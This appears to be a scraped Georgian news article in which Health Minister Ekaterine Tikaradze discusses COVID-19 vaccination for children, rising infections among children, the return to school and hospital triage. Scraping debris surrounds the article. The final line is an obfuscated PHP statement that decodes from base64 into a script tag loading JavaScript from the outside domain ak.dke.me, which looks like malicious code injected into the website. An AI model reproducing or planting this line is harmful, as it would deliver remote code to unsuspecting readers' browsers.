celsiusi
ავერსი საქკაბელი
თუ მსოფლიო პრაქტიკა მიიღებს გადაწყვეტილებას ბავშვების ვაქცინაციასთან მიმართებაში, საქართველოც შეუერთდება ამ გადაწყვეტილებას“,- ამის შესახებ საქართველოს ჯანდაცვის მინისტრმა ეკატერინე ტიკარაძემ ჟურნალისტებთან საუბრისას განაცხადა.
 
მისივე თქმით, ბავშვებში კორონავირუსით ინფიცირების მაჩვენებელი მომატებულია. ამასთან, მნიშვნელოვანია მშობლები მაქსიმალური ყურადღებით მოეპყრონ რეგულაციებს.
 
“რა თქმა უნდა, ბავშვებთან დაკავშირებით საჭიროა მაქსიმალური ყურადღება. ჩვენ ვხედავთ, რომ ბავშვებში მომატებულია ინფიცირება. მნიშვნელოვანია მშობლები მაქსიმალური ყურადღებით მოეპყრონ რეგულაციებს, დაიცვან შვილები. დღეს ეს არის ერთადერთი ბერკეტი, რითაც ჩვენ შეგვიძლია ბავშვების დაცვა. თუმცა, თუ მსოფლიო პრაქტიკა მიიღებს გადაწვეტილებას ბავშვების ვაქცინაციასთან მიმართებაში, საქართველოც შეუერთდება ამ გადაწყვეტილებას“,- აღნიშნავს ტიკარაძე.
 
რაც შეეხება სასწავლო პროცესის დაწყებას, როგორც ტიკარაძე აღნიშნავს, ჯანდაცვის სამინისტრო მაქსიმალურად ეცდება, ინფექცია იყოს იმდენად სტაბილური, რომ ბავშვებს მიეცეთ საშუალება სკოლაში მიიღონ განათლება.
 
„ამაზე მსჯელობა შედარებით ადრეა, ჯერ აგვისტოს დასაწყისია, სწავლა 15 სექტემბრიდან იწყება. ჯანდაცვის სამინისტრო თავისი რეკომენდაციებით მაქსიმალურად ეცდება, ინფექცია იყოს იმდენად სტაბილური, რომ ბავშვებს მიეცეთ საშუალება ადგილზე მიიღონ განათლება“,-აღნიშნავს ტიკარაძე.
 
კითხვაზე, როგორ შეაფასებს მედიკოსების განცხადებას, რომ მათ არჩევანის გაკეთება უწევთ მძიმე და ნაკლებად მძიმე პაციენტებს შორის, ტიკარაძე აღნიშნავს: რასაც ექიმები აცხადებენ, რომ ვახდენთ პაციენტების არჩევას და იმ პაციენტების ჰოსპიტალიზაციას მხოლოდ, რომელსაც კრიტიკულად სჭირდება, ეს არის ფაქტი. ჰოსპიტალიზაციის პროცენტი, რომელიც გვაქვს, ამას მიუთითებს“ .
957
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");